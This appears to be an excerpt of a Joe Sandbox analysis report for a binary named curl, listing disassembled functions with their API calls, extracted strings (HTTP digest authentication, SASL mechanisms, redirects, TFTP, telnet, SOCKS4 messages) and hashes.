Opcode Fuzzy Hash: 622d24819474ecf2b6aaeea90886bc373104484d04cba96a0f23b939ac3a8014
Instruction Fuzzy Hash: 08C1E3B050D305DAD700DF16C18465ABBE4BB88748F108D2FE4C9A3291E378E999DF5B

Function 00446120 Relevance: 47.6, APIs: 14, Strings: 13, Instructions: 343stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004461D0
strlen.MSVCRT ref: 00446216
strlen.MSVCRT ref: 00446255
strlen.MSVCRT ref: 004462DA
strlen.MSVCRT ref: 0044631D
curl_msnprintf.CURL ref: 00446371
curl_msnprintf.CURL ref: 004463AA

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_msnprintf.CURL ref: 004464C4
strlen.MSVCRT ref: 00446521
strlen.MSVCRT ref: 00446564
strlen.MSVCRT ref: 004465A4
strlen.MSVCRT ref: 004465E8
curl_msnprintf.CURL ref: 00446673
curl_maprintf.CURL ref: 004466CA

Strings

auth, xrefs: 004465DD
ENTI, xrefs: 00446172
%02x, xrefs: 0044635D, 004464B0, 0044665F
0001, xrefs: 00446148
5678, xrefs: 0044615D
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s, xrefs: 004466A9
%s/%s, xrefs: 00446381
0000, xrefs: 0044655D
AUTH, xrefs: 004463C5
1234, xrefs: 00446316
CATE, xrefs: 0044617A
, xrefs: 0044662B
md5-sess, xrefs: 00446121

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_msnprintf$curl_maprintfcurl_mvsnprintf
String ID: $%02x$%s/%s$0000$0001$1234$5678$AUTH$CATE$ENTI$auth$md5-sess$username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
API String ID: 2782508141-2450527480
Opcode ID: bbc6d2023255388180a51d5d8bf15b58c6978637dc54663c4f0f92bea57e87db
Instruction ID: a9a104cc2d1503ce457a1fb23ada2475f22be34ba2bd72840924a4335dd5bfa0
Opcode Fuzzy Hash: bbc6d2023255388180a51d5d8bf15b58c6978637dc54663c4f0f92bea57e87db
Instruction Fuzzy Hash: 2BF1B4B05087459FD710EF65C08529EFBE4AF85748F468C2EE4C887351EBB8E5888B97

Function 00402CF0 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 154stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00402D03
_strdup.MSVCRT ref: 00402D11
malloc.MSVCRT ref: 00402D28
strtok.MSVCRT ref: 00402D45
strtok.MSVCRT ref: 00402D63
strcpy.MSVCRT ref: 00402DB7
_access.MSVCRT ref: 00402DC7
free.MSVCRT ref: 00402DDD
free.MSVCRT ref: 00402DE5
_mkdir.MSVCRT ref: 00402DF7
GetLastError.KERNEL32 ref: 00402E01
curl_mfprintf.CURL ref: 00402E40
curl_msnprintf.CURL ref: 00402E6A
curl_msnprintf.CURL ref: 00402E93
curl_mfprintf.CURL ref: 00402EC1
curl_mfprintf.CURL ref: 00402EE3
curl_mfprintf.CURL ref: 00402F05
curl_mfprintf.CURL ref: 00402F27
curl_mfprintf.CURL ref: 00402F49

Strings

The directory name %s is too long., xrefs: 00402EFA
No space left on the file system that will contain the directory %s., xrefs: 00402E35
%s%s, xrefs: 00402E57, 00402E84
Cannot create directory %s because you exceeded your quota., xrefs: 00402EB6
%s resides on a read-only file system., xrefs: 00402ED8
Error creating directory %s., xrefs: 00402F1C
You don't have permission to create %s., xrefs: 00402F3E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintf$curl_msnprintffreestrtok$ErrorLast_access_mkdir_strdupmallocstrcpystrlen
String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
API String ID: 1704727858-1086585624
Opcode ID: a637b713e2e7ac575323b7c1b96a804c0ffd2adcc616d2edbd86ebfe3667b4fc
Instruction ID: 36fad1edac1a4161ed5a963eda4d4996850faa10e5506d4af0b6d7104970f998
Opcode Fuzzy Hash: a637b713e2e7ac575323b7c1b96a804c0ffd2adcc616d2edbd86ebfe3667b4fc
Instruction Fuzzy Hash: 995151705087049BC700AF65C58821EBAE0AF85359F15897FF8C9DB392D7BCDC899B4A

Function 0043AB90 Relevance: 39.3, APIs: 12, Strings: 14, Instructions: 274stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0043AB9F
memcmp.MSVCRT ref: 0043AC5A
memcmp.MSVCRT ref: 0043AC82

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

NTLM, xrefs: 0043B341
EXTERNAL, xrefs: 0043B26C
Remote access denied: %d, xrefs: 0043ABEC
GSSAPI, xrefs: 0043B23C
STARTTLS not supported., xrefs: 0043ACEB
CRAM-MD5, xrefs: 0043B1FD
DIGEST-MD5, xrefs: 0043B153
SIZE, xrefs: 0043AC76
PLAIN, xrefs: 0043B1D6
XOAUTH2, xrefs: 0043B3BC
LOGIN, xrefs: 0043B1A8
AUTH , xrefs: 0043B0A0
HELO %s, xrefs: 0043AE2E
STARTTLS, xrefs: 0043AC4E, 0043B375

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcmpstrlen$curl_mvsnprintf
String ID: AUTH $CRAM-MD5$DIGEST-MD5$EXTERNAL$GSSAPI$HELO %s$LOGIN$NTLM$PLAIN$Remote access denied: %d$SIZE$STARTTLS$STARTTLS not supported.$XOAUTH2
API String ID: 1090881438-2524436534
Opcode ID: 157ab11334ded470e1b9608dce6f3fffe30ad3e620fa0ad2d1e8651170068c38
Instruction ID: a2e1d381cdb3bcaaa5d3b13dc0f33a9b77811d8f6b4bb73f8237243300193b26
Opcode Fuzzy Hash: 157ab11334ded470e1b9608dce6f3fffe30ad3e620fa0ad2d1e8651170068c38
Instruction Fuzzy Hash: A0B16D70A093008BDB209F15C58536FB7E1FB89388F55A81FE9C88B311E779D8459B8B

Function 00441DD0 Relevance: 37.1, APIs: 12, Strings: 9, Instructions: 333stringCOMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 00441E05
strstr.MSVCRT ref: 00441E3B
strchr.MSVCRT ref: 00441E64
strrchr.MSVCRT ref: 00441E88
strchr.MSVCRT ref: 00441EA8
strrchr.MSVCRT ref: 00441EE5
strlen.MSVCRT ref: 00441F01
memcpy.MSVCRT ref: 00441F3E

Strings

Violate RFC 2616/10.3.3 and switch from POST to GET, xrefs: 004421EF
HEAD, xrefs: 00442198
Maximum (%ld) redirects followed, xrefs: 00442127
Disables POST, goes with %s, xrefs: 004421A7
Issue another request to this URL: '%s', xrefs: 00441FC3
Violate RFC 2616/10.3.2 and switch from POST to GET, xrefs: 0044222F
?, xrefs: 004422BA
GET, xrefs: 004421B4
%15[^?&/:]://%c, xrefs: 00441DFA

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchrstrrchr$memcpysscanfstrlenstrstr
String ID: %15[^?&/:]://%c$?$Disables POST, goes with %s$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Violate RFC 2616/10.3.2 and switch from POST to GET$Violate RFC 2616/10.3.3 and switch from POST to GET
API String ID: 606471014-2816762659
Opcode ID: bcd48757a6904a7e4a3326721f6690016ef7ece780095ee9cfe8ebab834f07bd
Instruction ID: a1b53182b492930beef88ac0bb076f8b8b63abccd24d33cd9a335f9de0610122
Opcode Fuzzy Hash: bcd48757a6904a7e4a3326721f6690016ef7ece780095ee9cfe8ebab834f07bd
Instruction Fuzzy Hash: B0D151B45083418FE7109F24C58836BBBE0BF84745F19487EEC898B366E778C885DB5A

Function 00434340 Relevance: 37.0, APIs: 9, Strings: 12, Instructions: 262COMMON

Download Yara Rule

Strings

Internal state machine error, xrefs: 004343A3
tsize, xrefs: 004345AC
@, xrefs: 00434642
tftp_send_first: internal error, xrefs: 00434710
%s, xrefs: 0043436F
TFTP finished, xrefs: 00434367
octet, xrefs: 004343CB
%s%c%s%c, xrefs: 00434524
timeout, xrefs: 00434669
blksize, xrefs: 0043460C
netascii, xrefs: 004343D2
%I64d, xrefs: 00434583

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mvsnprintfstrlen
String ID: %I64d$%s$%s%c%s%c$@$Internal state machine error$TFTP finished$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
API String ID: 4171543846-1887809526
Opcode ID: 100547d3915fada6b2ee8ecba898dbcff3b6b6761ac7bcc5a587145a2868a177
Instruction ID: 6ffeed370bd4c621bd9b1cc5a7d5fde17e37d59f8397f2915e2679da9c6805d4
Opcode Fuzzy Hash: 100547d3915fada6b2ee8ecba898dbcff3b6b6761ac7bcc5a587145a2868a177
Instruction Fuzzy Hash: 2AB10CB4A04700CFCB04DF69C4846AEBBE1FF88354F14897EE8998B355D778E8458B96

Function 0043DBCC Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 252stringCOMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 0043DAE5
strchr.MSVCRT ref: 0043DB3F
curl_msnprintf.CURL ref: 0043DC3D

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

strlen.MSVCRT ref: 0043DC49

Part of subcall function 00443440: curl_msnprintf.CURL ref: 0044355B
Part of subcall function 00443440: strlen.MSVCRT ref: 00443581

curl_maprintf.CURL ref: 0043DCBE
curl_maprintf.CURL ref: 0043DD4C

Part of subcall function 00421080: GetTickCount.KERNEL32 ref: 00421084

Strings

%s:%s:%s, xrefs: 0043DADA
%s, algorithm="%s", xrefs: 0043DEF1
Proxy-, xrefs: 0043DE1E
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=%08x, qop=%s, response="%s", xrefs: 0043DE60
!, xrefs: 0043DC13
%s:%s:%08x:%s:%s:%s, xrefs: 0043DD39
%08x%08x%08x%08x, xrefs: 0043DC0B
%s:%.*s, xrefs: 0043DCA0
auth, xrefs: 0043DE7E
auth-int, xrefs: 0043DCCC
%s, opaque="%s", xrefs: 0043DEBF

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf$curl_msnprintfstrlen$CountTickcurl_mvsnprintfstrchr
String ID: !$%08x%08x%08x%08x$%s, algorithm="%s"$%s, opaque="%s"$%s:%.*s$%s:%s:%08x:%s:%s:%s$%s:%s:%s$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=%08x, qop=%s, response="%s"$Proxy-$auth$auth-int
API String ID: 2039612362-3954609319
Opcode ID: 353c59574206efee823ac3a9900cff3f225f6af98e1f30b5e0e73bc5ddc3fce3
Instruction ID: c11423af4aca6b4da8360783c1db349cfedafdd84ba863fe1855dfacbea058d1
Opcode Fuzzy Hash: 353c59574206efee823ac3a9900cff3f225f6af98e1f30b5e0e73bc5ddc3fce3
Instruction Fuzzy Hash: D6B1A3B4A093419FC320EF2AD18065BFBE0AF88744F419C2EE9D987351E778E944CB46

Function 00451B16 Relevance: 37.0, APIs: 2, Strings: 19, Instructions: 236networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

htons.WS2_32 ref: 00451D05
htons.WS2_32 ref: 00451D13

Strings

, not IAC SE!) , xrefs: 00451C55
(Empty suboption?), xrefs: 00451C79
Width: %hu ; Height: %hu, xrefs: 00451D25
%s , xrefs: 00451BCA
INFO/REPLY, xrefs: 00451D81
RCVD, xrefs: 00451B3C
NAME, xrefs: 00451D4B
SENT, xrefs: 00451B37
"%s", xrefs: 00451DB4
<, xrefs: 00451B33
%u , xrefs: 00451BE6
%s (unsupported), xrefs: 00451CC9
SEND, xrefs: 00451D6F
IS, xrefs: 00451D5D
%d (unknown), xrefs: 00451CDF
= , xrefs: 00451DF9
%s IAC SB , xrefs: 00451B41
(terminated by , xrefs: 00451B84
%.2x, xrefs: 00451E4E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: htons$curl_mvsnprintfstrlen
String ID: "%s"$ %.2x$ = $ INFO/REPLY$ IS$ NAME$ SEND$%d (unknown)$%s $%s (unsupported)$%s IAC SB $%u $(Empty suboption?)$(terminated by $, not IAC SE!) $<$RCVD$SENT$Width: %hu ; Height: %hu
API String ID: 1128228894-2075090297
Opcode ID: ce5be5eeee85f52871ab5ee9ed0dc4228a9c0625f0a6238906efd9952710e417
Instruction ID: b2968fe724227e9dbb615d8dc940ca51c53ce02a44697e2be5736cc54334fb62
Opcode Fuzzy Hash: ce5be5eeee85f52871ab5ee9ed0dc4228a9c0625f0a6238906efd9952710e417
Instruction Fuzzy Hash: 87A10AB0808655DBCB10AF59C0852BEBBF1AF85305F11C81FE8D55B322D37D988ADB5A

Function 00439189 Relevance: 36.3, APIs: 12, Strings: 12, Instructions: 252stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004391A3
memcmp.MSVCRT ref: 00439397
memcmp.MSVCRT ref: 004393C3
memcmp.MSVCRT ref: 004393F8
memcmp.MSVCRT ref: 004394C3

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

PLAIN, xrefs: 00439597
EXTERNAL, xrefs: 00439822
GSSAPI, xrefs: 004397F5
XOAUTH2, xrefs: 0043997E
CRAM-MD5, xrefs: 0043978E
STLS, xrefs: 0043938C, 00439921
SASL , xrefs: 004393ED
USER, xrefs: 004393B4
STLS not supported., xrefs: 004391F1
LOGIN, xrefs: 0043952F
NTLM, xrefs: 004398FC
DIGEST-MD5, xrefs: 004394BB

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcmp$strlen$curl_mvsnprintf
String ID: CRAM-MD5$DIGEST-MD5$EXTERNAL$GSSAPI$LOGIN$NTLM$PLAIN$SASL $STLS$STLS not supported.$USER$XOAUTH2
API String ID: 1399774960-2007333287
Opcode ID: 17c2e7301d649cd0d74f43b43ae7880381524a2b64e413f9f356b0025fa60212
Instruction ID: 1f322fc3d56cd666477a61fef1c27220ecf91f83e03d1874ac893c980b03523a
Opcode Fuzzy Hash: 17c2e7301d649cd0d74f43b43ae7880381524a2b64e413f9f356b0025fa60212
Instruction Fuzzy Hash: 39A161B0A083049BD7149F15C18466BBBE1AF98348F14982FE9898B351E7B8DD46CF0F

Function 004383E1 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 198COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 004384B1
curl_strnequal.CURL ref: 004384ED
curl_strnequal.CURL ref: 00438555
curl_strnequal.CURL ref: 00438606

Strings

PLAIN, xrefs: 0043862D
GSSAPI, xrefs: 004386CA
AUTH, xrefs: 004384A6, 004384E2
XOAUTH2, xrefs: 0043872E
+APOP, xrefs: 0043859F
CRAM-MD5, xrefs: 00438666
LOGIN, xrefs: 004385FB
NTLM, xrefs: 004386FC
DIGEST-MD5, xrefs: 00438698

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: +APOP$AUTH$CRAM-MD5$DIGEST-MD5$GSSAPI$LOGIN$NTLM$PLAIN$XOAUTH2
API String ID: 482932555-859382407
Opcode ID: b488537c414c70fbf5f289f429f29396476342048e3bc9c13d93842b90f752b3
Instruction ID: 63707d125853c14cca2cde0723675a7c1c9c94c75a477ac4ec2ce5bd7ee11af4
Opcode Fuzzy Hash: b488537c414c70fbf5f289f429f29396476342048e3bc9c13d93842b90f752b3
Instruction Fuzzy Hash: 768117B0508702ABD7209F25C14435BFBE4AF98348F10991EF6DA87391EB78D9498B5F

Function 004286F9 Relevance: 34.9, APIs: 12, Strings: 11, Instructions: 357stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00427EC7
strlen.MSVCRT ref: 00427EDF
strlen.MSVCRT ref: 00427EEF
strlen.MSVCRT ref: 00427EFB
memcpy.MSVCRT ref: 00427F40
memcpy.MSVCRT ref: 00427F62
memcpy.MSVCRT ref: 00427F97
strstr.MSVCRT ref: 0042800C
strlen.MSVCRT ref: 00428167
strlen.MSVCRT ref: 00428703
memmove.MSVCRT ref: 00428719
strchr.MSVCRT ref: 00428729
strlen.MSVCRT ref: 00428C30
curl_msnprintf.CURL ref: 00428C78

Strings

Content-Range:, xrefs: 004280EE
%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 004282CB
%s%s=%s, xrefs: 004283B4
Accept: */*, xrefs: 00428091
Accept:, xrefs: 0042807D
], xrefs: 0042871E
Cookie: , xrefs: 004283E4
;type=, xrefs: 00428001
1.1, xrefs: 0042810D
ftp://, xrefs: 00427FDF
%s , xrefs: 00428140

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$memcpy$strstr$curl_msnprintfmemmovestrchr
String ID: %s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s$%s%s=%s$1.1$;type=$Accept:$Accept: */*$Content-Range:$Cookie: $]$ftp://
API String ID: 727234384-1565080330
Opcode ID: 6f7e3a9db9ed9667a29acc8eafc4ec4661473fc68a7c0a339773e8fa7e618c9d
Instruction ID: d46fc2861717db484ae588dc9798fbe3a399ab99cec6ad51995e16d4478282a5
Opcode Fuzzy Hash: 6f7e3a9db9ed9667a29acc8eafc4ec4661473fc68a7c0a339773e8fa7e618c9d
Instruction Fuzzy Hash: FBF115B4609B018FC714DF29C58462BFBE1BFC4744F55892EE89987325EB38E845CB4A

Function 0043E190 Relevance: 34.8, APIs: 7, Strings: 16, Instructions: 346stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00413E40: ioctlsocket.WS2_32 ref: 00413E68

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

strlen.MSVCRT ref: 0043E25F
memcpy.MSVCRT ref: 0043E2AC
strlen.MSVCRT ref: 0043E2B4
sscanf.MSVCRT ref: 0043E3D0
strlen.MSVCRT ref: 0043E455
memcpy.MSVCRT ref: 0043E493

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

SOCKS4 communication to %s:%d, xrefs: 0043E1F3
Failed to send SOCKS4 connect request., xrefs: 0043E306
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 0043E7AB
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 0043E624
Too long SOCKS proxy name, can't use!, xrefs: 0043E26B
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 0043E745
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 0043E6E3
@, xrefs: 0043E391
%hu.%hu.%hu.%hu, xrefs: 0043E3C5
SOCKS4 connect to %s (locally resolved), xrefs: 0043E3E2, 0043E4B9
Failed to resolve "%s" for SOCKS4 connect., xrefs: 0043E409
SOCKS4%s request granted., xrefs: 0043E6A4
\, xrefs: 0043E7A3
Connection time-out, xrefs: 0043E329
SOCKS4 reply has wrong version, version should be 4., xrefs: 0043E672
Failed to receive SOCKS4 connect request ack., xrefs: 0043E5B2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
